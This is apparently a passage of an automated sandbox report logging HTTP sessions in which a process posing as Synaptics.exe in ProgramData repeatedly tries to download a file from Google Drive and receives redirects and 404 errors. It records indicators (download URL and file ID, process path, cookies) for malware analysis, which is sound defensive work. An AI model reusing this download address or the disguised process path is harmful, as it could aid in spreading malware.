                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:38 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 45 50 67 38 7a 72 77 78 31 73 70 58 61 5a 4a 65 5a 4e 75 33 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NEPg8zrwx1spXaZJeZNu3w">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                            2025-01-02 19:29:38 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.949804172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:38 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:38 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-zYL4tlKpIHgK3IDfDNmMUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.949805216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:38 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-02 19:29:38 UTC1602INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC5PKj0gjZlvsCdru1uVNVr4MdtZMc4AQh_qUyFhF0Dn7iWspvKkjx3XTHzkZihEhVrZwzdUuCM
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:38 GMT
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-62o_YLA8cl8YfHLHe_CXNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Set-Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1; expires=Fri, 04-Jul-2025 19:29:38 GMT; path=/; domain=.google.com; HttpOnly
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:38 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 5f 55 55 79 64 6f 2d 42 58 73 38 53 77 31 63 47 63 64 59 6d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="f_UUydo-BXs8Sw1cGcdYmg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                            2025-01-02 19:29:38 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.949814172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:39 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:39 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-euTvY0uhsMLlGbpPLGDTyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.949813172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:39 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:39 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:39 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-LLDIVZ1RQW91AuoQidvRRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.949815216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:39 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-02 19:29:39 UTC1594INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6sC2lZrJA-l3hOYAiPt0lyQyjLwqFdVM33GOHBJBpjiv552WQusJ8_F5JMSQZK-z5N
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:39 GMT
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-H2_9HJIzCwczujo_3Z1K_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Set-Cookie: NID=520=hVlbUWvKAsXXeF2w1QNF8q5JgoN1tzf87ge04HU4z-izoj3_LDtGDRc8bxdZ01BsH-o2bzsVRFQ5r_WfhaVrhAteUAMZUwwIBUUg2Bex0dX01kJtDPaFFK0wIq1WKZ5eH2OJNc4egmV2sSWKiE-nh0MxGmLMyVzjQur-zpbgCqpOWYbRsspUiMg; expires=Fri, 04-Jul-2025 19:29:39 GMT; path=/; domain=.google.com; HttpOnly
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:39 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 41 38 6c 48 34 50 4c 61 73 47 7a 70 49 4a 4e 45 77 4f 49 47 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QA8lH4PLasGzpIJNEwOIGw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                            2025-01-02 19:29:39 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.949816216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:39 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-02 19:29:39 UTC1602INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6Hcwz4wxkCELk8Qx9hid7Tand15HZ9j3eCHIdF6Lxhiok9ZF1vOGm0rCWCFGchKW9Y4A6nLLs
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:39 GMT
                                                                                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-h4CCyWIbjl7YTN0uvsjLtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Set-Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs; expires=Fri, 04-Jul-2025 19:29:39 GMT; path=/; domain=.google.com; HttpOnly
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:29:39 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 50 56 48 4d 79 6d 65 68 44 78 77 4d 52 61 75 72 71 6e 72 4b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dPVHMymehDxwMRaurqnrKw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                            2025-01-02 19:29:39 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            10192.168.2.949824172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:40 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:40 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:40 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-kfo-CMRhMkDhCGbGaf7i7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            11192.168.2.949825172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:40 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            2025-01-02 19:29:40 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:40 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-f08YOa0wOND3vuqowJ-zuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            12192.168.2.949826216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:29:40 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=YEndgGdZr8HdDID1Vij3o43G0uyZAjGGe75mH81jI0SidRmzMFA61fI8c-2mKRwlZjHee06yoNi2xLr2zeDivgMDa4OM57x0Ftt78Uy8abbKfqNAJMVQaFMthPAL-r46LQxgk8QW_qAVWyDJ7EAv62cj5dyZTVEi6VKrsS9i99dIafXw8VQXYox1
                                                                                            2025-01-02 19:29:40 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC429XhP-hpcchtd5LdC_XfyNf7aJezG5B4iNQmIIyKMt3ouDmTH4ZujKGLXTFl1fiIM
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:29:40 GMT
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce--W7XS9W0WI45mIuQgoYYow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
